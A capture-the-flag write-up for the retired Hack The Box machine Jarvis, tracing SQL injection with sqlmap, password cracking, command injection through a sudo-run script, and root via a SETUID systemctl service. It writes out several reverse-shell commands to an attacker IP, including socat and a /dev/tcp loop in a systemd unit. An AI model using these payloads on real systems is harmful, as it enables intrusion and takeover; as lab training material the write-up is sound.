Writeup for the retired HTB machine Jarvis
nmap reveals a very limited port selection:
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0) 80/tcp open http Apache httpd 2.4.25 ((Debian)) 5355/tcp filtered llmnr 64999/tcp open http Apache httpd 2.4.25 ((Debian))
The web page on port 80 is a php site with not much at the first glance.
On port 64999 you’ll get a blank page with “Hey you have been banned for 90 seconds, don’t be bad” on the first call.
As a preliminary investigation, gobuster is used to find additional content on the webserver.
Gobuster port 80
/images (Status: 301) /index.php (Status: 200) /nav.php (Status: 200) /footer.php (Status: 200) /back.php (Status: 200) /css (Status: 301) /js (Status: 301) /fonts (Status: 301) /phpmyadmin (Status: 301) /connection.php (Status: 200) /room.php (Status: 302) /sass (Status: 301) /server-status (Status: 403)
Exploring the website leads to weird reactions if the Room Booking (http://10.10.10.143/room.php?cod=1) is manipulated with. Guessing from these results and the URL schema, a closer inspection of SQL Injection capabilities was concluded.
Running SQLmap with the dump parameter yields to successful execution.
sqlmap -u http://10.10.10.143/room.php?cod=2 --dump
As a next step, a password dump is attempted with rockyou.txt as dictionary file:
sqlmap -u http://10.10.10.143/room.php?cod=2 --passwords
which is successful:
[10:43:12] [INFO] the back-end DBMS is MySQL web server operating system: Linux Debian 9.0 (stretch) web application technology: PHP, Apache 2.4.25 back-end DBMS: MySQL >= 5.0.12 (...) [10:44:04] [INFO] starting dictionary-based cracking (mysql_passwd) [10:44:04] [INFO] starting 2 processes [10:44:04] [INFO] cracked password 'imissyou' for user 'DBadmin' (...) database management system users password hashes: [*] DBadmin : password hash: *2D2B7A5E4E637B8FBA1D17F40318F277D29964D0 clear-text password: imissyou
With these credentials, loggin into phpMyAdmin is possible. As SQLMap is also able to spawn shells under certain circumstances, this is worth trying as well:
sqlmap -u http://10.10.10.143/room.php?cod=2 --os-shell
which yields a shell as
www-data. By looking around a bit, we learn that the target OS user is named
Also, there’s an interesting script in
Again, with SQLMap, this file can be downloaded:
sqlmap -u http://10.10.10.143/room.php?cod=2 --file-read=/var/www/Admin-Utilities/simpler.py
On closer inspection, the script seems to execute actions in the user home folder of pepper. As this script is executed as www-data, there must be a sudo entry to run it as pepper. This can be confirmed by running
sqlmap -u http://10.10.10.143/room.php?cod=2 --os-cmd="sudo -l"
Matching Defaults entries for www-data on jarvis: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User www-data may run the following commands on jarvis: (pepper : ALL) NOPASSWD: /var/www/Admin-Utilities/simpler.py
At this point, a switch to a fully interactive session is needed. This can be archieved by running a local webserver on the attacker machine and serving a prepared PHP reverse shell (apalaxsh.php) that is downloaded via
curl to the target systems web dir (www-data).
With a running netcat receiver on the attacker machine (
nc -nvlp 9999), the shell is triggered by pointing a browser to
/apalaxsh.php, which yields a shell.
Road to user
Now the script can be further examined in its native run environment as sudoed user:
sudo --user=pepper /var/www/Admin-Utilities/simpler.py
This article on Infoblox Shell Escape provides some ideas on how to escape via sudo/ping:
$ sudo --user=pepper /var/www/Admin-Utilities/simpler.py -p Enter an IP: $(cat /home/pepper/user.txt) ping: 2afa36c4f05b37b34259[...]]: Temporary failure in name resolution
which yields the user flag.
But this is not everything this shell can do. By upgrading the shell to a full interactive shell first (
python -c 'import pty; pty.spawn("/bin/sh")'),
we’re able to spawn a shell as pepper:
sudo --user=pepper /var/www/Admin-Utilities/simpler.py -p Enter an IP: $(/bin/bash) $(/bin/bash) pepper@jarvis:/$
This shell isn’t perfectly working, so it is upgraded to a full reverse shell. With nc running on port 8989, this command yields a fully functioning shell:
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.15.195:8989
Road to root
Exploring privilege escalation routes, it turns out that systemctl has the SETUID bit set, meaning it can run with root privileges. Creating a systemctl oneshot service that spawns a reverse shell as root is therefore possible:
[Unit] Description=Black magic happening, avert your eyes [Service] RemainAfterExit=yes Type=simple ExecStart=/bin/bash -c "exec 5<>/dev/tcp/10.10.15.195/8888; cat <&5 | while read line; do $line 2>&5 >&5; done" [Install] WantedBy=default.target
Then make use of systemctl link to link the service file into the correct position:
systemctl link /home/pepper/apalax.service
and enable it, therefore opening the connection to port 8888 on our Machine:
systemctl start --now apalax
This spawns a minimal shell that is functioning enough to print the contents of